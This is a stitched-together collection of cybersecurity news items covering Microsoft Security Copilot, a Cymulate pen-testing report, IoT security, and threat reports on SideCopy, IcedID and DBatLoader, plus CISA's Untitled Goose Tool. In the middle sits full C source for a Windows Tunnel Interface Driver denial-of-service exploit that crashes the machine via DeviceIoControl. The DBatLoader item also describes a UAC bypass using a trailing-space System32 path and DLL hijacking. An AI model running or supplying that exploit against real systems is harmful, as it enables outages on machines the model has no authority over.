Microsoft's new AI assistant tool helps cybersecurity teams investigate security incidents and hunt for threats.

Microsoft has been leaning into its $10 billion investment in OpenAI by introducing AI assistants – all called Copilot – across its product portfolio. The latest one is Microsoft Security Copilot, to help security teams investigate and respond to security incidents.

Defenders are having a hard time dealing with a very dynamic security environment, and Microsoft Security Copilot is intended to make defenders’ lives better by using artificial intelligence to help them catch incidents that they may otherwise miss, improve the quality of threat detection, and speed up response, says Chang Kawaguchi, vice president and AI Security Architect at Microsoft. Security Copilot uses both OpenAI’s GPT-4 generative AI model and Microsoft’s proprietary security-based model to identify breaches, connect threat signals, and analyze data.

Security Copilot is intended to make “defenders’ lives better, make them more efficient, and make them more effective by bringing AI to this problem,” Kawaguchi says.

Security Copilot will ingest and make sense of huge amounts of security data – including the 65 trillion security signals Microsoft pulls every day and all the data being collected by the Microsoft products the organization is using, such as Microsoft Sentinel, Defender, Entra, Priva, Purview, and Intune. Analysts can summarize incidents, analyze vulnerabilities, and look up data on common vulnerabilities and exposures.

Analysts and incident response teams will be able to type what they are trying to understand into a text prompt – “/ask about” – and Security Copilot will return responses based on what it knows of the organization’s data. This way, security teams will be able to see connections between various parts of a security incident, such as a suspicious email, a malicious software file, or the different parts of the system that had been compromised, says Kawaguchi. The queries could be general, such as an explanation of a vulnerability, or specific to the organization’s environment, such as looking in the logs for signs that a particular Exchange flaw had been exploited. And because Security Copilot uses GPT-4, it can respond to natural language questions.

The analyst can see summaries of what happened and then follow prompts from Security Copilot to drill down deeper in the investigation. All these steps can be saved in a “pinboard,” which can be shared with other members of the security team as well as stakeholders and senior executives. All the tasks that have been completed are saved and readily accessible. There is also an automatically generated summary which will update as new tasks are completed.

“This is what makes this experience more of a notebook than a chat bot experience,” says Kawaguchi, noting that the tool can also create PowerPoint presentations based on the investigation that the security team can use to share the details of the incident afterward.

Security Copilot is not designed to replace human analysts, but to provide them with the information they need to move quickly and at scale during the course of an investigation, Kawaguchi says. Threat hunters can also use the tool to determine whether an organization is susceptible to known vulnerabilities and exploits by examining each asset in the environment, according to the company.

Forrester Senior Analyst Allie Mellen said in an email that Security Copilot was the first time a product focused on using AI to improve investigation and response. Previously AI tended to focus more on detection, Mellen said.

In a demo, Kawaguchi showed how Security Copilot can look at a cyberattack and figure out how the malware got into the network and infected the victim’s machine. Security Copilot can perform log analysis, display alert summaries, and generate graphs and other visualizations to show the sequence of events in the incident. The tool can also suggest steps for remediation and guidance.

If the information provided looks incorrect, or “off target,” there is a way to provide feedback immediately so that the model can learn. Security Copilot will continually improve as it learns from the company’s own data, as well as Microsoft’s extensive security research and visibility over the global threat landscape. However, the organization’s data will never be used to train the main Security Copilot algorithm, Kawaguchi says.

Microsoft has been flexing its AI-clout in recent weeks, going beyond Copilot in GitHub, which helps developers write code. A few weeks ago, the company announced Microsoft 365 Copilot, which allows users to use Copilot to do things like put together a PowerPoint presentation and write up articles in Word. Copilot in Dynamics 365 helps sales and customer success representatives engage with customers and prospects by sending natural-sounding messages, rather than relying on premade boilerplate messages.

Security Copilot is currently in private preview; Kawaguchi declined to specify a date for when it will be generally available, noting that it all depended on how organizations wind up using the tool. There are also long-term plans for extending Security Copilot to ingest information from other security vendors’ products.

“Security Copilot is poised to become the connective tissue for all Microsoft security products and, importantly, will integrate with third-party products as well,” Forrester’s Mellen said.

“We think that AI has the opportunity to change the game for almost all things that security folks do. We're starting with the investigation flow because this is the one where we think there's a massive amount of opportunity for efficiency and effectiveness,” Kawaguichi says.

Microsoft Security Copilot Uses GPT-4 to Beef Up Security Incident Response

A lack of website protections, Sender Policy Framework (SPF) records, and DNSSEC configurations leave companies open to phishing and data exfiltration attacks.

The risk score for the average company worsened in the past year as companies fail to adapt to data exfiltration techniques and adequately protect Web applications.

Companies' effective data-exfiltration risk increased to 44 out of 100 (with 100 indicating having the riskiest posture) in 2022, from an average score of 30 in the previous year, indicating that the overall risk of data being compromised has increased. That's according to rankings by Cymulate, which crunched the data on 1 million pen tests, including 1.7 million hours of offensive cybersecurity testing within its production environments.

In its "2022 State of Cybersecurity Effectiveness" report, published on March 28, the firm noted that there are various persistent problems leading to increased risk. For one, while many companies are improving their adoption and the strictness of network and group policies, attackers are adapting to sidestep such protections, the report stated. 

And the basics continue to lag: The company found that four of the top-10 CVEs identified in customer environments were more than two years old. These include the high-severity WinVerifyTrust signature validation vulnerability (CVE-2013-2900), which can allow malicious executables to pass security checks, and a memory corruption vulnerability in Microsoft Office (CVE-2018-0798).

    

How Cymulate scores risk. Source: Cymulate

There is good news, however. Data from the security assessments indicates that companies have all improved risk scores for malware detection across major platforms, and many attacks are blocked by Web gateways. 

Overall, businesses need to treat cybersecurity like any other business process, with regular checks on controls, says Mike DeNapoli, director of technical messaging for Cymulate.

"Cybersecurity needs to become a process treated like any other business process, with checks and balances and regular review," he says. "The CFO would never permit the books to remain closed except for once per year, but the systems that house all that money as data routinely only get checked out during an annual pen-test, which has to change."

All of this comes against the backdrop that companies are increasingly focused on securing their entire attack surface, improving resiliency to cyberattacks, and preventing disruption of information systems. As a result, cybersecurity services and products that reduce complexity have become more popular while large technology firms have thrown their hat into the ring, such as Microsoft's launch of Defender External Attack Surface Management in August and IBM's purchase of ASM startup Randori in June. Time will tell if these trends will move the needle on risk.

    

While the exposure risk due to WAFs has dropped, data-exfiltration risk has increased. Source: Cymulate

Meanwhile, Cymulate's analysis of a year of offensive cybersecurity testing also found that cloud and email continue to provide rich sandboxes for hackers.

**Attacks Increasingly Coming From Popular Clouds**

Attackers have shifted some aspects of their attacks away from using popular file sharing services, such as Dropbox and Box to evade email attachment filters and other security technologies, to using more generic cloud infrastructure, such as Amazon and Azure. Businesses have a harder time blocking data from large, trusted service providers, which serve as the backbone for many large cloud services and websites, DeNapoli says.

"These metrics are applied to hundreds of attempts to remove data that should be considered 'controlled' from the organization," he says. "This increase means that organizations have less control over preventing business confidential, personally identifiable, and other controlled data from being removed from the organization in unauthorized ways."

The top most successful tactics used by simulated attackers in the Cymulate research included attacking users through their browsers in a drive-by compromise scenario, archiving and exfiltrating data, and transferring that data to a cloud account, such as AWS or Azure.

**"Email Defenses Are a Team Sport"**

Nearly half of the top 10 exposures uncovered by Cymulate's pen testing involved a lack of security for basic IT infrastructure. The simulations discovered that common issues included not recognizing phishing domains, a failure to configure DNSSEC, and a lack of two technologies — Domain-based Message Authentication, Reporting, and Conformance (DMARC) and Sender Policy Framework (SPF) — that can help stop email-based attacks.

Overall, companies have been slow to deploy critical email security and integrity technologies, such as DMARC, SPF, and a third technology, Domain Keys Identified Mail (DKIM) — together which can help prevent phishing success and brand fraud. While companies which implement DMARC, DKIM, and SPF records can better protect against email-based attacks, the technology standards are only truly effective if both sides of an exchange are using them, DeNapoli says.

"We need to begin to recognize that email defenses are a team sport and implement our part of the processes so others can be safer," he notes. "The benefit is that as more and more organizations implement these processes, our organization also becomes safer."

The report also showed that different industries have different strengths and weaknesses. The education and hospitality sectors, for example, had the highest risk of data exfiltration, while protections against the most immediate threats were lowest in the technology sector. Both technology and government organizations had worse-than-average Web application firewall protection.

Millions of Pen Tests Show Companies' Security Postures Are Getting Worse

Microsoft on Tuesday unveiled Security Copilot in preview, marking its continued push to embed AI-oriented features in an attempt to offer "end-to-end defense at machine speed and scale."
Powered by OpenAI's GPT-4 generative AI and its own security-specific model, it's billed as a security analysis tool that enables cybersecurity analysts to quickly respond to threats, process signals, and

Artificial Intelligence / Cyber Threat

Microsoft on Tuesday unveiled **Security Copilot** in preview, marking its continued push to embed AI-oriented features in an attempt to offer "end-to-end defense at machine speed and scale."

Powered by OpenAI's GPT-4 generative AI and its own security-specific model, it's billed as a security analysis tool that enables cybersecurity analysts to quickly respond to threats, process signals, and assess risk exposure.

To that end, it collates insights and data from various products like Microsoft Sentinel, Defender, and Intune to help security teams better understand their environment; determine if they are susceptible to known vulnerabilities and exploits; identify ongoing attacks their scale, and receive remediation instructions; and summarize incidents.

Users, for instance, can ask Security Copilot about suspicious user logins over a specific time period, or even employ it to create a PowerPoint presentation outlining an incident and its attack chain. It can also accept files, URLs, and code snippets for analysis.

Redmond said its proprietary security-specific model is informed by more than 65 trillion daily signals, emphasizing that the tool is privacy-compliant and customer data "is not used to train the foundation AI models."

"Today the odds remain stacked against cybersecurity professionals," Vasu Jakkal, Microsoft's corporate vice president of Security, Compliance, Identity, and Management, pointed out.

"Too often, they fight an asymmetric battle against prolific, relentless and sophisticated attackers. To protect their organizations, defenders must respond to threats that are often hidden among noise."

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

Security Copilot is the latest AI push from Microsoft, which has been steadily integrating generative AI features into its software offerings over the past two months, including Bing, Edge browser, GitHub, LinkedIn, and Skype.

The development also comes weeks after the tech giant launched Microsoft 365 Copilot, integrating AI capabilities within its suite of productivity and enterprise apps such as Office, Outlook, and Teams.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Microsoft Introduces GPT-4 AI-Powered Security Copilot Tool to Empower Defenders

The new tool aims to deliver the network insights and coordination that “AI” security systems have long promised.

For years now, “artificial intelligence” has been a hot buzzword in the cybersecurity industry, promising tools that spot suspicious behavior on a network, quickly figure out what's going on, and guide incident response if there's an intrusion. The most credible and useful of services, though, have actually been machine learning algorithms trained to spot characteristics of malware and other dubious network activity. Now, as generative AI tools proliferate, Microsoft says it has finally built a service for defenders that's worthy of all the hype.

Two weeks ago, the company launched Microsoft 365 Copilot, which builds on a partnership with OpenAI along with Microsoft's own work on large language models. The company is now rolling out Security Copilot, a sort of security field notebook that integrates system data and network monitoring from security tools like Microsoft Sentinel and Defender and even third-party services. 

Security Copilot can surface alerts, map out in both words and charts what may be going on within a network, and provide steps for a potential investigation. As a human user works with Copilot to map out a possible security incident, the platform tracks history and generates summaries, so if colleagues get added to the project, they can quickly come up to speed and see what's been done so far. The system will also automatically produce slides and other presentation tools about an investigation to help security teams communicate the facts of a situation to people outside their department, and particularly executives who may not have security experience but need to stay informed.   

“Over the past few years, what we’ve seen is this absolute escalation in the frequency of attacks, in the sophistication of attacks, as well as in the intensity of attacks,” says Vasu Jakkal, Microsoft’s chief vice president of security. “And there is not a lot of time for a defender to contain the escalation of an attack. The balance is right now shifted in the direction of attackers.” 

Courtesy of Microsoft

Jakkal says that while machine learning security tools have been effective in specific domains, like monitoring email or activity on individual devices—known as endpoint security—Security Copilot brings all of those separate streams together and extrapolates a bigger picture. “With Security Copilot you can catch what others may have missed because it forms that connective tissue,” she says.

Security Copilot is largely powered by OpenAI's ChatGPT-4, but Microsoft emphasizes that it also integrates a proprietary Microsoft security-specific model. The system tracks everything that's done during an investigation. The resulting record can be audited, and the materials it produces for distribution can all be edited for accuracy and clarity. If something Copilot is suggesting during an investigation is wrong or irrelevant, users can click the “Off Target” button to further train the system.

The platform offers access controls so certain colleagues can be shared on particular projects and not others, which is especially important for investigating possible insider threats. And Security Copilot allows for a sort of backstop for 24/7 monitoring. That way, even if someone with a specific skillset isn't working on a given shift or a given day, the system can offer basic analysis and suggestions to help plug gaps. For example, if a team wants to quickly analyze a script or software binary that may be malicious, Security Copilot can start that work and contextualize how the software has been behaving and what its goals may be.

Microsoft emphasizes that customer data is not shared with others and is “not used to train or enrich foundation AI models.” Microsoft does pride itself, though, on using “65 trillion daily signals” from its massive customer base around the world to inform its threat detection and defense products. But Jakkal and her colleague, Chang Kawaguchi, Microsoft's vice president and AI security architect, emphasize that Security Copilot is subject to the same data-sharing restrictions and regulations as any of the security products it integrates with. So if you already use Microsoft Sentinel or Defender, Security Copilot must comply with the privacy policies of those services.

Kawaguchi says that Security Copilot has been built to be as flexible and open-ended as possible, and that customer reactions will inform future feature additions and improvements. The system's usefulness will ultimately come down to how insightful and accurate it can be about each customer’s network and the threats they face. But Kawaguchi says that the most important thing is for defenders to start benefiting from generative AI as quickly as possible.

As he puts it: “We need to equip defenders with AI given that attackers are going to use it regardless of what we do.”

Microsoft's ‘Security Copilot’ Sics ChatGPT on Security Breaches

Tunnel Interface Driver suffers from a denial of service vulnerability.

    // Exploit Title: Tunnel Interface Driver - Denial of Service// Date: 07/15/2022// Exploit Author: ExAllocatePool2// Vendor Homepage: https://www.microsoft.com/// Software Link: https://www.microsoft.com/en-us/software-download/windows10// Version: Windows 10 Pro Version 21H2 (OS Build 19044.1288)// Tested on: Microsoft Windows// GitHub Repository: https://github.com/Exploitables/MSRC-1#include <Windows.h>#include <stdio.h>#define TARGET_DEVICE "\\\\.\\GLOBALROOT\\Device\\TunnelControl"int main(int argc, char** argv);int main(int argc, char** argv){  HANDLE h_driver = CreateFileA(TARGET_DEVICE, 0x80, 0, 0, OPEN_EXISTING, 0, 0);  unsigned long long input_output = 0x4242424242424242;  unsigned long bytes_returned = 0x43434343;  unsigned char unused = 0;  SetConsoleTitleA("https://msrc.microsoft.com/");  printf("[*] Microsoft Security and Response Center Report #1\n[*] Microsoft Tunnel Interface Driver Null Pointer Dereference Denial of Service Vulnerability\n[*] Exploit written by ExAllocatePool2\n[!] Let's exploit!");  if (h_driver == (HANDLE)-1)  {    printf("\n[-] Failed to obtain a handle to the vulnerable device driver. Error: %d (0x%x)", GetLastError(), GetLastError());    unused = getchar();    return 1;  }  printf("\n[+] Obtained a handle to the vulnerable device driver. Handle Value: 0x%p", h_driver);  printf("\n[!] Triggering a denial of service via arbitrary read in 3...");  for (int i = 2; i > 0; i--)  {    Sleep(1000);    printf("\n[!] %d...", i);  }  DeviceIoControl(h_driver, 0, &input_output, 8, &input_output, 8, &bytes_returned, 0);  unused = getchar();  printf("\n[-] Exploit failed. The machine should have crashed.");  return 0;}

Tunnel Interface Driver Denial Of Service

IoT risk and security must get more attention from vendors and support from the marketplace.

The Internet of Things (IoT) is and always will be a contentious subject for cybersecurity. Not because of the convenience these devices add but for the risk they inject into the lives of people and businesses.

As cybersecurity professionals, we often quote cynical jokes to laugh and cope with the reality of our jobs. So stop me if you've heard this one: Did you know that the S in IoT stands for security? Half of you chuckled at it, and the other half probably took a second to realize that there is no S or security in the IoT acronym.

As cybersecurity professionals, we're often stuck between a rock and a hard place when assessing the risk these devices pose to us personally and professionally. There are more than a billion IoT devices on the Internet, each with the potential to be exploited. A business might have a compelling business imperative an IoT solution can enable, but that solution may inject an undue security risk into protecting safety and productivity. A Wi-Fi-connected security camera may give a homeowner peace of mind about securing a property, but may also expose that property to additional risk from hackers who can take control of the camera and abuse the platform.

**Market Forces vs. IoT Vendors**

So how did we get here? The easy answer is: IoT vendors continue to fail us on implementing solid cybersecurity controls. The difficult answer is: The market continues to push many IoT vendors into offering the lowest cost and most competitive products. They achieve this by sacrificing or outright neglecting cybersecurity for their solutions.

By choosing to not address security, vendors are pushing the risk to the consumers who are often oblivious to the dangers. In commercial solutions, this can have serious consequences. A medical facility that relies on IoT devices to manage patient care cannot weather an outage without endangering patients. Nor would they want patient data inadvertently exposed due to insecure IoT devices, or worse, have actual medical care disrupted.

So how did we, as consumers and dependents of IoT, get here to this untenable state of IoT risk and security? The answers, as they always seem to do, eventually lead back to money.

There are quite a few big-name players in the commercial and residential IoT space. These are name brands that most everyone can recognize: Google, Huawei, Microsoft, and others. While these companies are mature and responsive to security threats in IoT, it's the more niche companies that are more concerning.

**IoT Cost Points**

So, here's a thought experiment. Imagine you're a small IoT company and you want to develop a niche product that will enter an already crowded IoT market. What kind of costs does it take to develop the IoT product? Some cost points to consider:

**1\. Qualified development personnel are hard to come by for IoT.** You will need a solid team of hardware, networking, application design, business intelligence and automation experts to help bring your product to market.

**2\. Hardware and software costs can range from small to huge sums of money.** The more complex the device and service, the higher the cost.

**3\. What is the connection model?** Wi-Fi, Bluetooth, cellular? Each adds more to the cost, some more than others.

**4\. You must design a product UI!** If you intend to win on the merits of your product, a smooth user experience is a must.

**5\. What about security?** Do we have to use encryption? How about a secure protocol, or hardware that has secure firmware? Well, unless there's a regulatory requirement, there's no money for it. We have to keep costs down if we intend to compete.

**Best IoT Security Development Steps**

While the scenario is a generalization, it's not far from the truth. Developing an IoT product with security features adds to costs many companies either do not consider, or have deliberately chosen to neglect. Further complicating things, what if the company that makes an IoT device no longer supports it? Or what if that company simply goes out of business?

Is any of this resolvable? To an extent, yes. Companies can usually push over-the-air (OTA) updates to products that can address security issues. They can also utilize cloud service frameworks that mandate security between the device, the cloud, and the company. Vendors can also employ outside third parties to audit and evaluate the IoT solution. An outside third party can fairly evaluate and help the vendor address vulnerabilities in the hardware or software. Application developers can be trained in secure software development. The product can be designed with hardware robust enough to accommodate secure implementations.

However, all these things represent monetary investments a company has to willingly make. And the investments are continuous — with every device patch or new feature offering, the same security evaluations have to be performed again and again.

**It's Time to Step Up**

What do we do? The first step is educating the consumers. As security professionals, we must do our best to help others have situational awareness and help evaluate risk. This in turn can help for security investments that can help mitigate the vulnerabilities that some IoT devices inject into our risk models.

Helping call out insecure practices and companies can also help. We have a unique opportunity and position to help advocate for everyone who utilizes an IoT device and should use our voices to help wherever we can.

Spend on Safety Measures & Call Out Insecure Practices for Safer IoT

An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT.
According to Cyble, which attributed the operation to SideCopy, the activity cluster is designed to target the Defence Research and Development Organization (DRDO), the research and development wing of India's Ministry of

Advanced Persistent Threat

An advanced persistent threat (APT) group that has a track record of targeting India and Afghanistan has been linked to a new phishing campaign that delivers Action RAT.

According to Cyble, which attributed the operation to **SideCopy**, the activity cluster is designed to target the Defence Research and Development Organization (DRDO), the research and development wing of India's Ministry of Defence.

Known for emulating the infection chains associated with SideWinder to deliver its own malware, SideCopy is a threat group of Pakistani origin that shares overlaps with Transparent Tribe. It has been active since at least 2019.

Attack chains mounted by the group involve using spear-phishing emails to gain initial access. These messages come bearing a ZIP archive file that contains a Windows shortcut file (.LNK) masquerading as information about the K-4 ballistic missile developed by DRDO.

Executing the .LNK file leads to the retrieval of an HTML application from a remote server, which, in turn, displays a decoy presentation, while also stealthily deploying the Action RAT backdoor.

The malware, in addition to gathering information about the victim machine, is capable of running commands sent from a command-and-control (C2) server, including harvesting files and dropping follow-on malware.

Also deployed is a new information-stealing malware referred to as AuTo Stealer that's equipped to gather and exfiltrate Microsoft Office files, PDF documents, database and text files, and images over HTTP or TCP.

"The APT group continuously evolves its techniques while incorporating new tools into its arsenal," Cyble noted.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

This is not the first time SideCopy has employed Action RAT in its attacks directed against India. In December 2021, Malwarebytes disclosed a set of intrusions that breached a number of ministries in Afghanistan and a shared government computer in India to steal sensitive credentials.

The latest findings arrive a month after the adversarial crew was spotted targeting Indian government agencies with a remote access trojan dubbed ReverseRAT.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Pakistan-Origin SideCopy Linked to New Cyberattack on India's Ministry of Defence

Multiple threat actors have been observed using two new variants of the IcedID malware in the wild with more limited functionality that removes functionality related to online banking fraud.
IcedID, also known as BokBot, started off as a banking trojan in 2017. It's also capable of delivering additional malware, including ransomware.
"The well-known IcedID version consists of an initial loader

Ransomware / Endpoint Security

Multiple threat actors have been observed using two new variants of the IcedID malware in the wild with more limited functionality that removes functionality related to online banking fraud.

IcedID, also known as BokBot, started off as a banking trojan in 2017. It's also capable of delivering additional malware, including ransomware.

"The well-known IcedID version consists of an initial loader which contacts a Loader \[command-and-control\] server, downloads the standard DLL Loader, which then delivers the standard IcedID Bot," Proofpoint said in a new report published Monday.

One of the new versions is a Lite variant that was previously highlighted as being dropped as a follow-on payload by the Emotet malware in November 2022. Also newly observed in February 2023 is a Forked variant of IcedID.

Both these variants are designed to drop what's called a Forked version of IcedID Bot that leaves out the web injects and backconnect functionality that would typically be used for banking fraud, the enterprise security firm noted.

"It is likely a cluster of threat actors is using modified variants to pivot the malware away from typical banking trojan and banking fraud activity to focus on payload delivery, which likely includes prioritizing ransomware delivery," Proofpoint noted.

The February campaign has been tied to a new group christened TA581, with the threat actor distributing the Forked variant using weaponized Microsoft OneNote attachments. Another malware used by TA581 is the Bumblebee loader.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

In all, the Forked IcedID variant has been employed in seven different campaigns to date, some of which have been undertaken by initial access brokers (IABs).

The use of existing Emotet infections to deliver the Lite variant has raised the possibility of a potential partnership between Emotet developers and IcedID operators.

"While historically IcedID's main function was a banking trojan, the removal of banking functionality aligns with the overall landscape shift away from banking malware and an increasing focus on being a loader for follow-on infections, including ransomware," the researchers said.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

IcedID Malware Shifts Focus from Banking Fraud to Ransomware Delivery

A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed DBatLoader.
"The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report

A new phishing campaign has set its sights on European entities to distribute Remcos RAT and Formbook via a malware loader dubbed **DBatLoader**.

"The malware payload is distributed through WordPress websites that have authorized SSL certificates, which is a common tactic used by threat actors to evade detection engines," Zscaler researchers Meghraj Nandanwar and Satyam Singh said in a report published Monday.

The findings build upon a previous report from SentinelOne last month that detailed phishing emails containing malicious attachments that masquerade as financial documents to activate the infection chain.

Some of the file formats used to distribute the DBatLoader payload concern the use of a multi-layered obfuscated HTML file and OneNote attachments.

The development adds to growing abuse of OneNote files as an initial vector for malware distribution since late last year in response to Microsoft's decision to block macros by default in files downloaded from the internet.

DBatLoader, also called ModiLoader and NatsoLoader, is a Delphi-based malware that's capable of delivering follow-on payloads from cloud services like Google Drive and Microsoft OneDrive, while also adopting image steganography techniques to evade detection engines.

One notable aspect of the attack is the use of mock trusted directories such as "C:\\Windows \\System32" (note the trailing space after Windows) to bypass User Account Control (UAC) and escalate privileges.

WEBINAR

Discover the Hidden Dangers of Third-Party SaaS Apps

Are you aware of the risks associated with third-party app access to your company's SaaS apps? Join our webinar to learn about the types of permissions being granted and how to minimize risk.

RESERVE YOUR SEAT

A caveat here is that the directories cannot be directly created from within the Windows Explorer user interface, instead requiring the attacker to rely on a script to accomplish the task and copy to the folder a rogue DLL and a legitimate executable (easinvoker.exe) that's vulnerable to DLL hijacking in order to load the DLL payload.

This enables the attackers to conduct elevated activities without alerting users, including establishing persistence and adding the "C:\\Users" directory to the Microsoft Defender exclusion list to avoid getting scanned.

To mitigate risks posed by DBatLoader, it's advised to monitor process executions that involve filesystem paths with trailing spaces and consider configuring Windows UAC to Always notify.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

Stealthy DBatLoader Malware Loader Spreading Remcos RAT and Formbook in Europe

CISA released the hunt and response tool to help defenders extract cloud artifacts without performing additional analytics.

The Untitled Goose Tool is the latest tool from the United States Cybersecurity and Infrastructure Security Agency to help enterprise security teams respond to attacks.

Developed in conjunction with Sandia National Labs, the Untitled Goose Tool “offers novel authentication and data gathering methods for network defenders to use as they interrogate and analyze their Microsoft cloud services,” CISA said in its announcement, which specifically listed Microsoft Azure, Microsoft 365, and Azure Active Directory. With this tool, defenders can run a full investigation by interrogating and collecting Azure Active Directory sign-in and audit logs, Microsoft 365 unified audit log, Azure activity logs, Microsoft Defender for IoT (Internet of Things) alerts, and Microsoft Defender for Endpoint data for suspicious activity, CISA said in its Untitled Goose Tool fact sheet. Defenders can also query, export, and investigate Azure Active Directory, Microsoft 365, and Azure configurations.

The hunt and incident response tool was designed to assist incident response teams export cloud artifacts after an incident for environments that aren’t ingesting logs into the organization’s Security Information and Events Management (SIEM) platform, CISA said on the Untitled Goose GitHub repository page. The defenders can then ingest the JSON results into an existing SIEM, web browser, text editor, or database, for additional analysis.

The Untitled Goose Tools was announced on the same day as the Pre-Ransomware Notification Initiative, which aims to warn organizations about ransomware attacks early enough so that organizations can block the attempt to steal or encrypt data. Earlier in March, CISA announced the Decider tool, which will help organizations map adversary behavior to the MITRE ATT&CK framework to find gaps in their defenses, as well as the Ransomware Vulnerability Warning Pilot, to warn critical infrastructure entities about flaws in their systems.

Keep up with the latest cybersecurity threats, newly-discovered vulnerabilities, data breach information, and emerging trends. Delivered daily or weekly right to your email inbox.

Subscribe

Tag

#microsoft